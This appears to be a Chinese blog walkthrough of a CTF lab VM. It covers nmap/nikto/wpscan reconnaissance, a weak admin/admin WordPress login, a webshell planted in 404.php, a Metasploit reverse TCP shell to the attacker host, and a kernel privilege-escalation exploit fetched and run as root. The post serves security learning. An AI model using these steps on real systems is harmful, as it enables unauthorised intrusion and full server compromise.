CTF-综合测试(高难度)【超详细】
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
web安全介绍
环境配置
信息探测
深入挖掘
nikto扫描到robots.txt并进行访问
robots.txt文件出现/wordpress/,对其进行访问
返现用户登录界面,进行账号的枚举
尝试弱口令登录
生成webshell
上传shell
启动监听
执行shell
查看系统信息
提权
searchsploit ubuntu 4.4.0
编译代码
上传shellroot到/var/www/html下
下载shellroot到靶机
给shellroot提权并执行
web安全介绍
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网英语越来越广泛,企业信息化的过程中各种英语都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更严重的则是在网页中植入恶意代码,使得网站访问者收到侵害。
环境配置
kali 192.168.20.128
靶机 192.168.20.142
链接:https://pan.baidu.com/s/1JOpCuCiS_ycd_ZRyehr4qw
提取码:6cpf
信息探测
nmap -sV 192.168.20.142
nmap -A -v -T4 192.168.20.142
nikto -host http://192.168.20.142
dirb http://192.168.20.142
深入挖掘
nikto扫描到robots.txt并进行访问
robots.txt文件出现/wordpress/,对其进行访问
返现用户登录界面,进行账号的枚举
wpscan --url http://192.168.20.142/wordpress/ --enumerate at --enumerate ap --enumerate u
尝试弱口令登录
admin/admin
生成webshell
上传shell
复制生成的shell上传到404页面上
启动监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.20.128
set lport 4444
run
执行shell
http://192.168.20.142/wordpress/wp-content/themes/twentyfourteen/404.php
查看系统信息
提权
sudo -l提权不行
searchsploit ubuntu 4.4.0
编译代码
上传shellroot到/var/www/html下
下载shellroot到靶机
给shellroot提权并执行
chomod 777 shellroot
执行shellroot
CTF-综合测试(高难度)【超详细】相关推荐
- CTF|密码学常用网站超详细汇总
CTF之密码学常用网站汇总 CTF中那些脑洞大开的编码和加密 https://www.tuicool.com/articles/2E3INnm 一篇文章彻底弄懂Base64编码原理 https://b ...
- JavaScript实现表单阻断提交--高效高可用超详细
在web开发共,我们有验证表单的业务,用户的输入符合我们的要求,就可以提交,用户的输入不符合要求,就阻止用户提交,这样能够更好的提高用户体验,减轻服务器的压力.前台能完成的事情,就在前台完成. 效果图 ...
- Mobileye超详细研报:高逼格ADAS的内在修养
Mobileye超详细研报:高逼格ADAS的内在修养 易车途2015-04-14 09:20:00 系统 工作 美国 阅读(58097)评论(0)分享到 清明节的时候,我去了一趟美国的大姨妈家,发现美 ...
- k8s1.18多master节点高可用集群安装-超详细中文官方文档
kubernetes安装系列文章 kubernetes1.17.3安装-超详细的安装步骤 安装kubernetes1.17.3多master节点的高可用集群 k8s1.18单master节点高可用集群 ...
- 详解 K8S 高可用部署,超详细
一.前言 二.基础环境部署 1)前期准备(所有节点) 2)安装容器 docker(所有节点) 3)配置 k8s yum 源(所有节点) 4)将 sandbox_image 镜像源设置为阿里云 goog ...
- 超详细面经:无论文、无实习拿下腾讯CV算法岗
关注上方"深度学习技术前沿",选择"星标公众号", 资源干货,第一时间送达! 作者:清雨卢 知乎链接:https://zhuanlan.zhihu.com/p/ ...
- linux入门_Linux超详细0基础入门篇(一)
首先要感谢大康老师对我在Linux操作系统上的教导. 今天来讲一下用途广泛的Linux的基础入门教程 仅仅是做入门使用,如果想更加深入的学习那就需要自己做探索了. 本次例子使用的是kali linux ...
- 微服务Springcloud超详细教程+实战(二)
微服务Springcloud超详细教程+实战(二) -------------------------------------- 远程调用方式 无论是微服务还是分布式服务(都是SOA,都是面向服务编程 ...
- TypeScript超详细入门教程(上)
TypeScript超详细入门教程(上) 01 开篇词:Hello~TypeScript 01 开篇词:Hello~TypeScript 更新时间:2019-10-30 13:49:46 既然我已经踏 ...
- 卷积神经网络超详细介绍
文章目录 1.卷积神经网络的概念 2. 发展过程 3.如何利用CNN实现图像识别的任务 4.CNN的特征 5.CNN的求解 6.卷积神经网络注意事项 7.CNN发展综合介绍 8.LeNet-5结构分析 ...
最新文章
- 混合现实未来的八大应用场景
- spwm逆变器双极性matlab教程,基于MATLAB/Simulink的SPWM逆变电源的建模与仿真
- python用途与前景-Python 就业方面的选择与应用分析
- 集成学习-Boosting集成学习算法XGBoost
- simapro学习_北京师范大学环境学院
- mysql windows ad_您可以使用PHP获得Windows(AD)用户名吗?
- CLR via C# 笔记系列 - clr的执行模型
- Redis List 类型操作及常用命令
- mysql第三方工具binlog_mysql 开发进阶篇系列 33 工具篇(mysqlbinlog日志管理工具)
- 20190508——python基础(if...in...循环语句、while循环、两种循环对比)
- 10 件在 PHP 7 中不要做的事情
- oracle复制表到mysql_oracle – 如何将数据从一个数据库/表复制到另一个数据库/表...
- Hinton反思新作:我说反向传播不好,但还是没谁能颠覆它
- Steam怎么和Steam link远程畅玩?
- 2021/8/10 正在F-Droid里下载Termux...
- VS2019下cmake项目:利用ELAS方法计算双目视差
- 如何备份光猫html文件夹,华为光猫备份jffs2及HG8321R-RMS切换HG8321版本教程
- 汽车软件系统常用简称
- C#绘制中国象棋棋盘
- 码蹄集 - MT2095 · 曲径折跃